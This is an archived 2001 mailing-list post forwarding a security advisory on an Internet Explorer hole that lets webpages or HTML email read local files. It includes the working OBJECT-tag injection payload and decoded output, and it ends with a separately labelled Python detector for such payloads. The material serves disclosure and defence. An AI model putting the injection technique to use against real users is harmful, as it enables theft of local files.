[iwar] [fc:Internet.Explorer.allows.reading.of.local.files.by.remote.webpages]

From: Fred Cohen (fc@all.net)
Date: 2001-11-26 15:09:45


To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL3]
From: Fred Cohen <fc@all.net>
Date: Mon, 26 Nov 2001 15:09:45 -0800 (PST)
Subject: [iwar] [fc:Internet.Explorer.allows.reading.of.local.files.by.remote.webpages]

Summary
-------

There is a vulnerability in MS Internet Explorer that allows
any webpage or HTML email to read arbitrary local files.
This bug may also lead to remote command execution.


Vulnerable versions
-------------------

All versions of IE seem to be affected. The following
configurations have been tested and are vulnerable:

Windows 2000 pro, IE 5.50
Windows 2000 pro SP2, IE 6.0, fully patched
Windows XP pro, IE 6.0


Workaround
----------

Disable ActiveX in Internet Explorer


Exploit details
---------------

The exploit is based on a very vague advisory posted to
vuln-dev@securityfocus.com
by NOMEN NESCIO SECURITY ALERT
<hush.little.baby@hushmail.com>
on 21/11/2001:
http://www.securityfocus.com/archive/82/241482

Marc Fossi <mfossi@securityfocus.com>
suggests that this may be
another way to exploit an old vulnerability discovered by
Georgi Guninski: http://www.securityfocus.com/bid/1718


First we create either a "htmlfile_FullWindowEmbed" or a
"htmlfile" object (both work):

<OBJECT ID="myObject"
CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13">
</OBJECT>

Ok, alert(myObject.outerHTML); gives us the following:

<OBJECT id=myObject
classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNw
OzwvcD4=></OBJECT>

Decoding the Base64 string we get (hex dump):

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C703E266E627370 3B3C2F703E        <p>&nbsp;</p>

The first part is a GUID and the second one looks like HTML.
We inject the string
"<script>document.location.href="file://c:\\test.txt";</script>"
into the object using

<OBJECT ID="myObject"
CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"
data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+
ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+">
</OBJECT>

(There are probably easier ways to do this but I'm not very familiar
with IE coding).

Now to the interesting part. After c:\test.txt is loaded we can
still access the data parameter of the object using myObject.outerHTML.
This time it contains the Base64 encoded version of c:\test.txt among
other things.

So doing an alert(myObject.outerHTML); after the local file is loaded
we get:

<OBJECT id=myObject
classid=CLSID:25336921-03F9-11CF-8FD0-00AA00686F13
data=data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzwhRE9DV
FlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAgVHJhbnNpdGlvbmFsLy9
FTiI+DQo8SFRNTD48SEVBRD4NCjxNRVRBIGh0dHAtZXF1aXY9Q29udGVudC1UeXBlIGNvb
nRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD13aW5kb3dzLTEyNTIiPjwvSEVBRD4NCjxCT0R
ZPjxYTVA+aGVsbG8gd29ybGQ8L1hNUD48L0JPRFk+PC9IVE1MPg0K></OBJECT>

with the Base64 string decoding to:

20693325F903CF11 8FD000AA00686F13  .i3%.........ho.
3C21444F43545950 452048544D4C2050  <!DOCTYPE.HTML.P
55424C494320222D 2F2F5733432F2F44  UBLIC."-//W3C//D
54442048544D4C20 342E30205472616E  TD.HTML.4.0.Tran
736974696F6E616C 2F2F454E223E0D0A  sitional//EN">..
3C48544D4C3E3C48 4541443E0D0A3C4D  <HTML><HEAD>..<M
4554412068747470 2D65717569763D43  ETA.http-equiv=C
6F6E74656E742D54 79706520636F6E74  ontent-Type.cont
656E743D22746578 742F68746D6C3B20  ent="text/html;.
636861727365743D 77696E646F77732D  charset=windows-
31323532223E3C2F 484541443E0D0A3C  1252"></HEAD>..<
424F44593E3C584D 503E68656C6C6F20  BODY><XMP>hello.
776F726C643C2F58 4D503E3C2F424F44  world</XMP></BOD
593E3C2F48544D4C 3E0D0A            Y></HTML>..

where "hello world" is the contents of c:\test.txt.

It all boils down to an ordinary DOM circumvention with all the
usual implications.
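As an added illustration (not part of the advisory or its attachment), the Python below decodes the data:application/x-oleobject payloads quoted above into their 16-byte GUID and persisted HTML stream, and flags htmlfile OBJECT tags whose stream smuggles script or a file: URL, the kind of static check a mail gateway or content filter could apply to HTML mail. Read in Windows GUID byte order, the persisted GUID in the dumps is 25336920-03F9-11CF-8FD0-00AA00686F13, one less in its first field than the CLSID written in the tag; the sample page and the two-CLSID allow-list are constructed from the advisory's own values.

```python
import base64
import re
import uuid

# CLSIDs named in the advisory: htmlfile_FullWindowEmbed (...21) and htmlfile (...20).
HTMLFILE_CLSIDS = {"25336921-03F9-11CF-8FD0-00AA00686F13",
                   "25336920-03F9-11CF-8FD0-00AA00686F13"}
OLE_PREFIX = "data:application/x-oleobject;base64,"
OBJECT_RE = re.compile(r"<object\b[^>]*>", re.I)
ATTR_RE = re.compile(r'''(\w+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s>]+))''', re.S)

def parse_oleobject_data(data_attr):
    """Split an x-oleobject data URL into (CLSID, persisted stream): the
    advisory's hex dumps show a 16-byte Windows GUID (Data1..Data3 stored
    little-endian) followed by the object's persisted HTML."""
    if not data_attr.lower().startswith(OLE_PREFIX):
        raise ValueError("not an application/x-oleobject data URL")
    raw = base64.b64decode(re.sub(r"\s+", "", data_attr[len(OLE_PREFIX):]))
    if len(raw) < 16:
        raise ValueError("payload shorter than a GUID")
    return str(uuid.UUID(bytes_le=raw[:16])).upper(), raw[16:]

def find_suspicious_objects(html):
    """Return (tag CLSID, stream) for each htmlfile OBJECT whose persisted
    stream smuggles script or a file: URL, the pattern the advisory describes;
    an object carrying only markup such as <p>&nbsp;</p> is not reported."""
    findings = []
    for tag in OBJECT_RE.finditer(html):
        attrs = {m.group(1).lower(): (m.group(3) or m.group(4) or m.group(5) or "")
                 for m in ATTR_RE.finditer(tag.group(0))}
        clsid = attrs.get("classid", "").upper().replace("CLSID:", "")
        data = attrs.get("data", "")
        if clsid not in HTMLFILE_CLSIDS or not data.lower().startswith(OLE_PREFIX):
            continue
        _, stream = parse_oleobject_data(data)
        if b"<script" in stream.lower() or b"file:" in stream.lower():
            findings.append((clsid, stream))
    return findings

# Constructed sample page built from the two data payloads quoted in the advisory.
SAMPLE_HTML = '''
<OBJECT ID="benign" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"
 data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxwPiZuYnNwOzwvcD4="></OBJECT>
<OBJECT ID="myObject" CLASSID="CLSID:25336921-03F9-11CF-8FD0-00AA00686F13"
 data="data:application/x-oleobject;base64,IGkzJfkDzxGP0ACqAGhvEzxzY3JpcHQ+
ZG9jdW1lbnQubG9jYXRpb24uaHJlZj0iZmlsZTovL2M6XFx0ZXN0LnR4dCI7PC9zY3JpcHQ+"></OBJECT>
'''
```

Running find_suspicious_objects(SAMPLE_HTML) reports only the second object, with the decoded script shown in the advisory; the first, carrying just the empty paragraph, is ignored.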


Proof of concept exploit
------------------------

I have attached a zipped HTML file that reads c:\test.txt and
displays it.

regards,
Markus Kern

------------------
http://all.net/ 

This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:59 PST